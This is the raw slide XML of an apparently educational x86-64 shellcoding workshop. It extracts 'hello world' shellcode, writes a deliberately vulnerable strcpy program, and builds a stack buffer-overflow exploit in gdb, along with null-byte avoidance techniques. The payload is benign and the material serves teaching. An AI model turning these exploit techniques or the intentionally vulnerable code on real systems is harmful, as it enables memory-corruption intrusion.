                      <a:endParaRPr b="0" sz="1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None/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA" sz="1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"\x48\xc7\xc0\x01\x00\x00\x00"</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="1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None/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="0" sz="1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None/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="0" sz="1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None/>
                      </a:pPr>
                      <a:r>
                        <a:t/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0x04 Introduction to shellcoding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44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr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49" name="Google Shape;349;p44"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685344" y="12070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678375"/>
              </a:tblGrid>
              <a:tr h="2389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objdump -D hello -M intel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hello:     file format elf64-x86-64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Disassembly of section .text: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00000000004000b0 &lt;_start&gt;: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4000b0:       b8 01 00 00 00          mov    eax,0x1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4000b5:       bf 01 00 00 00          mov    edi,0x1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4000ba:       48 be d4 00 60 00 00    movabs rsi,0x6000d4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4000c1:       00 00 00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4000c4:       ba 0e 00 00 00          mov    edx,0xe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4000c9:       0f 05                   syscall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4000cb:       b8 3c 00 00 00          mov    eax,0x3c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4000d0:       0f 05                   syscall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Disassembly of section .data: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00000000006000d4 &lt;hello&gt;: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6000d4:       68 65 6c 6c 6f          push   0x6f6c6c65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6000d9:       20 77 6f                and    BYTE PTR [rdi+0x6f],dh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6000dc:       72 6c                   jb     60014a &lt;_end+0x62&gt;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6000de:       64 21 0a                and    DWORD PTR fs:[rdx],ecx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...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0x04 Introduction to shellcoding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45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr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56" name="Google Shape;356;p45"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685344" y="12070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678375"/>
              </a:tblGrid>
              <a:tr h="1280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#!/bin/bash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i in $(objdump -d $1 |grep "^ " |cut -f2); do echo -n '\x'$i; done; echo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57" name="Google Shape;357;p45"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685344" y="28256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678375"/>
              </a:tblGrid>
              <a:tr h="1280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gen_shellcode.sh hello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\xb8\x01\x00\x00\x00\xbf\x01\x00\x00\x00\x48\xbe\xa2\x00\x40\x00\x00\x00\x00\x00\xba\x0e\x00\x00\x00\x0f\x05\xb8\x3c\x00\x00\x00\x0f\x05\x68\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\x21\x0a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0x04 Introduction to shellcoding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" name="Google Shape;363;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr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 sz="3600">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>Yeah! Finally something that looks like shellcode :)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-11499" lvl="0" marL="36899" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1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rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1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 sz="3600">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>But how the hell do we test it?!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/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685346" y="0"/>
            <a:ext cx="84588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0x05 How to run your shellcode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47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685345" y="840260"/>
            <a:ext cx="8228100" cy="601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36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There </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="3600">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="fr-CA" sz="36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two main solutions.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-11499" lvl="0" marL="36899" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1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spcBef>
                <a:spcPts val="132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b="0" i="0" lang="fr-CA" sz="36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Use a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="3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fr-CA" sz="36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program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solas"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="fr-CA" sz="36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Use assembly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36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36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0x02 Analyzing « Hello World »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60" name="Google Shape;160;p21"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685343" y="12075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70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4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https://remote.ringzer0team.com:33333/workshop.pdf</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="4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8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0x05 How to run your shellcode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48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr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The C way.</a:t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76" name="Google Shape;376;p48"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685344" y="23845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556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&lt;stdio.h&gt;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main() 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char shellcode[] = "\xde\xad\xbe\xef";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int(*loader)(void);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loader = (int(*)())shellcode();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loader();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return 0;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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA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gcc loader.c –o loader –z execstack</a:t>
                      </a:r>
                      <a:endParaRPr b="0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./loader</a:t>
                      </a:r>
                      <a:endParaRPr b="0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0x05 How to run your shellcode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Google Shape;382;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr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1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The assembly way.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1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83" name="Google Shape;383;p49"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685344" y="18107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556450"/>
              </a:tblGrid>
              <a:tr h="189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BITS 64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 _start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section .text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_start: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db 0xde, 0xad, 0xbe, 0xef</a:t>
                      </a:r>
                      <a:endParaRPr b="0"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84" name="Google Shape;384;p49"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685344" y="40667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556450"/>
              </a:tblGrid>
              <a:tr h="95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#!/bin/bash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python -c "import sys;import re;print '0x' + ', 0x'.join(re.findall('..', sys.argv[1].replace(chr(0x5c) + chr(0x78), '')))" "$1"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85" name="Google Shape;385;p49"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685344" y="53860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556450"/>
              </a:tblGrid>
              <a:tr h="62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convert.sh</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA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fr-CA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"\xde\xad\xbe\xef"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0xde, 0xad, 0xbe, 0xef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0x05 How to run your shellcode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50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr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Since this is an assembly workshop we are going to use the assembly approach instead of the C wrapper.</a:t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0x05 How to run your shellcode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51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr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Let’s test our « Hello World » shellcode</a:t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98" name="Google Shape;398;p51"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685344" y="43596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556450"/>
              </a:tblGrid>
              <a:tr h="2089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BITS 64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 _start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section .text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_start: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onsolas"/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db 0xb8, 0x01, 0x00, 0x00, 0x00, 0xbf, 0x01, 0x00, 0x00, 0x00, 0x48, 0xbe, 0xa2, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x0e, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xb8, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x68, 0x65, 0x6c, 0x6c, 0x6f, 0x20, 0x77, 0x6f, 0x72, 0x6c, 0x64, 0x21, 0x0a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99" name="Google Shape;399;p51"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685344" y="24998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556450"/>
              </a:tblGrid>
              <a:tr h="1493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convert.sh "\xb8\x01\x00\x00\x00\xbf\x01\x00\x00\x00\x48\xbe\xa2\x00\x40\x00\x00\x00\x00\x00\xba\x0e\x00\x00\x00\x0f\x05\xb8\x3c\x00\x00\x00\x0f\x05\x68\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\x21\x0a"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0xb8, 0x01, 0x00, 0x00, 0x00, 0xbf, 0x01, 0x00, 0x00, 0x00, 0x48, 0xbe, 0xa2, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x0e, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xb8, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x68, 0x65, 0x6c, 0x6c, 0x6f, 0x20, 0x77, 0x6f, 0x72, 0x6c, 0x64, 0x21, 0x0a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00" name="Google Shape;400;p51"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685344" y="13715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556450"/>
              </a:tblGrid>
              <a:tr h="76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gen_shellcode.sh hello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\xb8\x01\x00\x00\x00\xbf\x01\x00\x00\x00\x48\xbe\xa2\x00\x40\x00\x00\x00\x00\x00\xba\x0e\x00\x00\x00\x0f\x05\xb8\x3c\x00\x00\x00\x0f\x05\x68\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\x21\x0a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0x05 How to run your shellcode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52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr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Let’s test our « Hello World » shellcode</a:t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24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Yeah! We wrote and executed our first shellcode!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="407" name="Google Shape;407;p52"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685344" y="13715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556450"/>
              </a:tblGrid>
              <a:tr h="76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nasm –felf64 loader.asm –o</a:t>
                      </a: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loader.o</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="16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ld loader.o –o loader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./loader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 world!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3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0x05 How to run your shellcode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Google Shape;413;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr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That was too simple too be real!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24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24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Let’s use the same shellcode payload in a real exploit.</a:t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4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0x05 How to run your shellcode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19" name="Google Shape;419;p54"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685346" y="13884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&lt;stdio.h&gt;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&lt;string.h&gt;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main(int argc, char **argv) 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char buffer[256];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printf("DEBUG: buffer at %p\n", buffer);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memset(buffer, 0, 256);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strcpy(buffer, argv[1]);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printf("%s\n", buffer);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return 0;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4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0" name="Google Shape;420;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/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Let’s code a simple vulnerable application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21" name="Google Shape;421;p54"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685326" y="41232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onsolas"/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</a:t>
                      </a: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gcc vuln.c -o vuln -z execstack -fno-stack-protector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0x05 How to run your shellcode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27" name="Google Shape;427;p55"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685325" y="16848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</a:t>
                      </a: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gdb -tui ./vuln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(gdb)</a:t>
                      </a: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 </a:t>
                      </a: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$(python -c "print 'A' * (256 + 8) + 'B' * 6")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Program received signal SIGSEGV, Segmentation fault.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Cannot access memory at address 0x424242424242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(gdb) i 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rax            0x0      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rbx            0x0      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rcx            0x7ffff7b0c620   140737348945440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rdx            0x7ffff7dd87a0   140737351878560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rsi            0x7ffff7ff8000   140737354104832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rdi            0x0      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rbp            0x4141414141414141       0x4141414141414141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rsp            0x7fffffffe4e0   0x7fffffffe4e0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r8             0x4141414141414141       4702111234474983745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r9             0x4141414141414141       4702111234474983745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r10            0x4141414141414141       4702111234474983745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r11            0x246    582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r12            0x4004e0 4195552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r13            0x7fffffffe5b0   140737488348592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r14            0x0      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r15            0x0      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rip            0x424242424242   0x424242424242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eflags         0x10246  [ PF ZF IF RF ]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8" name="Google Shape;428;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/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Time to trigger the buffer overflow and confirm that we control RIP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6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0x05 How to run your shellcode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34" name="Google Shape;434;p56"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685324" y="13377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104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</a:t>
                      </a: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gdb -tui ./vuln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(gdb)</a:t>
                      </a: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 $(python -c "print 'A' * 16 + "\xb8\x01\x00\x00\x00\xbf\x01\x00\x00\x00\x48\xbe\xa2\x00\x40\x00\x00\x00\x00\x00\xba\x0e\x00\x00\x00\x0f\x05\xb8\x3c\x00\x00\x00\x0f\x05\x68\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\x21\x0a" + "A" * (256 - (8 +  48)) + '\x7f\xff\xff\xff\xe3\xe0'[::-1]")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35" name="Google Shape;435;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/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Time to weaponize the exploit by adding our shellcode.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Stack before the call to strcpy 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0x40063b &lt;main+101&gt;  call   0x400480 &lt;strcpy@plt&gt;</a:t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36" name="Google Shape;436;p56"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685324" y="30279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0x7fffffffe3e0: 0x0000000000000000      0x0000000000000000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0x7fffffffe3f0: 0x0000000000000000      0x0000000000000000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0x7fffffffe400: 0x0000000000000000      0x0000000000000000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0x7fffffffe410: 0x0000000000000000      0x0000000000000000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37" name="Google Shape;437;p56"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685324" y="48263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0x7fffffffe3e0: 0x4141414141414141      0x4141414141414141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0x7fffffffe3f0: 0x40a2be4801bf01b8      0x050f3cb8050f0eba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0x7fffffffe400: 0x0000006f6c6c6568      0x0000000000000000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0x7fffffffe410: 0x0000000000000000      0x0000000000000000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7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0x05 How to run your shellcode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Google Shape;443;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/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Something is clearly wrong our payload is truncated and some of the bytes are truncated…</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-11500" lvl="0" marL="36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We just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA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discovered</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="fr-CA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our first shellcode enemy! NULL BYTE</a:t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06400" lvl="0" marL="45720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onsolas"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CA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Second is hardcoded offsets</a:t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onsolas"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CA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Third one is bad characters</a:t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0x02 Analyzing « Hello World »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67" name="Google Shape;167;p22"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685343" y="12075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758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BITS 64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 _start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section .text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_start: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mov rax, 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8" name="Google Shape;168;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="615323" y="3422822"/>
            <a:ext cx="8227995" cy="330749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1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BITS 64 </a:t>
            </a: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			de</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA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clares</a:t>
            </a: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the architecture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1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global _start </a:t>
            </a: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	defines the entry point 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1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section .text</a:t>
            </a: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	de</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA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clares the start of </a:t>
            </a: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the .text section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1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_start:</a:t>
            </a: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			de</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA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clare</a:t>
            </a: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a label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1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mov rax, 1</a:t>
            </a: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		assembly instruction</a:t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8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2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0x06 Introduction to shellcode optimization</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2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58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/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54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54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Most buffer overflows are caused by unsafe functions such as strcpy, strncpy, strcat, sprintf …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These functions are NULL byte sensitive since NULL byte indicate the end of a string of characters.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To avoid breaking our shellcode we need to avoid NULL bytes.</a:t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9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2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0x06 Introduction to shellcode optimization</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2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59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/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Second problem there is no way to use hardcoded offset since we don’t know the possible of our shellcode.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The address of the string is hardcoded and may not match the offset once it is loaded as shellcode.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56" name="Google Shape;456;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685327" y="21566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rax, hello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 db 0x41, 0x41, 0x41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57" name="Google Shape;457;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685327" y="30340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onsolas"/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4000ba:       48 be c1 00 40 00 00    movabs rax,0x4000c1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onsolas"/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4000c1:       41 41 41 41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0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2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0x06 Introduction to shellcode optimization</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2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60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/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Take care of the NULL bytes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First rule: use the proper register size while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA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you write your assembly code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rax = 0x0000000000000000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eax =         0x00000000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ax  =             0x0000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ah  =             0x</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="fr-CA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00</a:t>
            </a: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00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al  = 				  0x00</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="fr-CA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00</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="20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64" name="Google Shape;464;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685327" y="2723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eax, 1                ; </a:t>
                      </a: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b8 01 00 00 00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al, 1 </a:t>
                      </a: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; b0 01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1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2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0x06 Introduction to shellcode optimization</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2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0" name="Google Shape;470;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/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Take care of the NULL bytes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Keep in mind that using « al » will </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1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clear the rest of the register.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The register need be cleared first.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71" name="Google Shape;471;p61"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685345" y="26797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eax, 0x41414141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al, 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eax = 41414101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72" name="Google Shape;472;p61"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685327" y="43735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xor rax, rax              ; 48 31 c0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 rax, rax              ; 48 29 c0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sbb rax, rax              ; 48 19 c0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al, 1                 ; b0 01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2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2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0x06 Introduction to shellcode optimization</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2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8" name="Google Shape;478;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/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There is a technique that involve using </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="fr-CA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call</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="fr-CA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0" lang="fr-CA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b="0" i="0" lang="fr-CA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/>
          </a:p>
          <a:p>
            <a:pPr indent="-11500" lvl="0" marL="36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1" i="0" lang="fr-CA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Call</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="fr-CA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will save the address of the next instruction on the stack.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-11500" lvl="0" marL="36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RAX will contain 0x4 which points to our buffer </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-11500" lvl="0" marL="36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79" name="Google Shape;479;p62"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685345" y="30261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 jmp get_string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 _main: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0x2 pop rax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0x3 get_string: call _main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 string: db 0xde, 0xad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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685346" y="0"/>
            <a:ext cx="84588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2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0x06 Introduction to shellcode optimization</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2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5" name="Google Shape;485;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685345" y="840260"/>
            <a:ext cx="8228100" cy="601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This technique is efficient since the jmp instruction will jump by a certain number of bytes instead of a location.</a:t>
            </a:r>
            <a:endParaRPr/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86" name="Google Shape;486;p63"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685345" y="30261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917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0x100 junk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</a:t>
                      </a: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jmp get_string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</a:t>
                      </a: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_main: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0x102 pop rax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0x103 get_string: call _main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0x104 string: db 0xde, 0xad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0x015 junk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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685346" y="0"/>
            <a:ext cx="84588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2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0x06 Introduction to shellcode optimization</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2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2" name="Google Shape;492;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685345" y="840260"/>
            <a:ext cx="8228100" cy="601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Jumping by a certain offset is shellcode safe</a:t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54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The value is calculated based on your current location. Since you wrote the shellcode you know for a fact that the distance between the jump and the destination will not change.</a:t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93" name="Google Shape;493;p64"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="745858" y="20173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917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0x100 jmp _shellcode     ; jump $ + 20 = jmp 0x11d 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0x120 _shellcode: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0x121 … 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5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2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0x06 Introduction to shellcode optimization</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2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9" name="Google Shape;499;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685345" y="764060"/>
            <a:ext cx="8228100" cy="601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Relative addressing rely on RIP value to calculate your position</a:t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i="1" lang="fr-CA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Note: 64 bit only</a:t>
            </a:r>
            <a:endParaRPr i="1"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00" name="Google Shape;500;p65"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685344" y="19223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 lea rax, [rel string]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 string: db 0xde, 0xad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48 8d 05 00 00 00 00    lea    rax,[rip+0x0]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01" name="Google Shape;501;p65"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685327" y="34113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onsolas"/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 jmp code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onsolas"/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 string:   db 0xde, 0xad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 code:     lea rax, [rel string]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 mov rsi, rax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48 8d 05 f7 ff ff ff    lea    rax,[rip+0xfffffffffffffff7] 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6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2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0x06 Introduction to shellcode optimization</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2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7" name="Google Shape;507;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/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Pushing string on the stack</a:t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RAX now contain a pointer to your data.</a:t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54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Don’t forget the endianness. Usually it’s little endian</a:t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54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54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0x41424344 -- in memory -&gt; 0x44434241 </a:t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08" name="Google Shape;508;p66"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685327" y="14498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69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onsolas"/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 rax, 0x4141414142424242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onsolas"/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push rax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onsolas"/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 rax, rsp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Lustria"/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7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2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0x07 Optimizing the « Hello World » (Exercise)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2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4" name="Google Shape;514;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/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Exercise:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-11500" lvl="0" marL="36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Convert the hello world sample to a NULL byte free version.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-11500" lvl="0" marL="36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15 minutes</a:t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0x02 Analyzing « Hello World »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75" name="Google Shape;175;p23"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685343" y="12075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758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rax, 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6" name="Google Shape;176;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565896" y="1810710"/>
            <a:ext cx="8227995" cy="330749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1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mov		</a:t>
            </a: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instruction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1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rax		</a:t>
            </a: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general purpose register</a:t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1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		Value that will be put into rax</a:t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This can be translated to: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ctr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1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Move 1 into the rax register.</a:t>
            </a:r>
            <a:endParaRPr i="1"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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685346" y="0"/>
            <a:ext cx="84588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2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0x06 Introduction to shellcode optimization</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2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0" name="Google Shape;520;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685345" y="840260"/>
            <a:ext cx="8228100" cy="601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/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/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/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/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/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Null bytes need to be fixed and pointer to the “Hello World” string need to be shellcode safe</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="521" name="Google Shape;521;p68"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685390" y="8402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69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0:   b8 01 00 00 00      	mov	eax,0x1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5:   bf 01 00 00 00      	mov	edi,0x1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a:   48 be 00 00 00 00 00	movabs rsi,0x0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11:   00 00 00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14:   ba 0e 00 00 00      	mov	edx,0xe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19:   0f 05               	syscall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1b:   b8 3c 00 00 00      	mov	eax,0x3c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20:   0f 05               	syscall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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685346" y="0"/>
            <a:ext cx="84588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2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0x06 Introduction to shellcode optimization</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2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27" name="Google Shape;527;p69"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685390" y="8402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69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BITS 64</a:t>
                      </a:r>
                      <a:endParaRPr b="0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 _start</a:t>
                      </a:r>
                      <a:endParaRPr b="0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section .text</a:t>
                      </a:r>
                      <a:endParaRPr b="0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_start:</a:t>
                      </a:r>
                      <a:endParaRPr b="0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	 jmp _load_hello</a:t>
                      </a:r>
                      <a:endParaRPr b="0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_real_start:</a:t>
                      </a:r>
                      <a:endParaRPr b="0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	 pop rsi</a:t>
                      </a:r>
                      <a:endParaRPr b="0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	 xor rax, rax</a:t>
                      </a:r>
                      <a:endParaRPr b="0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	 inc rax</a:t>
                      </a:r>
                      <a:endParaRPr b="0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	 mov rdi, rax</a:t>
                      </a:r>
                      <a:endParaRPr b="0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 mov dl, 13</a:t>
                      </a:r>
                      <a:endParaRPr b="0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 syscall</a:t>
                      </a:r>
                      <a:endParaRPr b="0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 mov al, 60</a:t>
                      </a:r>
                      <a:endParaRPr b="0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 syscall</a:t>
                      </a:r>
                      <a:endParaRPr b="0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_load_hello:</a:t>
                      </a:r>
                      <a:endParaRPr b="0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	 call _real_start</a:t>
                      </a:r>
                      <a:endParaRPr b="0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 db "hello world!", 0x0a</a:t>
                      </a:r>
                      <a:endParaRPr b="0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28" name="Google Shape;528;p69"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
